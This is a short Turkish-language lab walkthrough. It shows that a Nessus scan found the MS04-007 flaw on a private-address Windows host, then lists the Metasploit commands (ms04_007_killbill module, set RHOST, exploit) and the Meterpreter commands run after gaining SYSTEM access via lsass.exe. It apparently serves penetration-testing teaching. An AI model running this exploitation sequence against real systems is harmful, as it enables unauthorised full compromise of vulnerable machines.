Nessus ile zafiyet taraması sonucunda 192.168.244.138 IP adresli bilgisayarda MS04-007 zafiyetinin tespit edildiği görülmektedir.
Metasploit üzerinde ilgili modülün (MSF ms04_007_killbill istismar modülü) seçenekleri aşağıdaki gibidir:
search ms04-007
use exploit/windows/smb/ms04_007_killbill
show options
Seçenek olarak hedef IP adresinin ayarlanması yeterlidir. Böylece modül çalıştırılabilir.
set RHOST 192.168.244.138
show options
exploit
Modül çalıştırıldığında SYSTEM haklarıyla lsass.exe prosesine enjekte olunduğu görülmektedir.
sysinfo
getuid
getpid
ps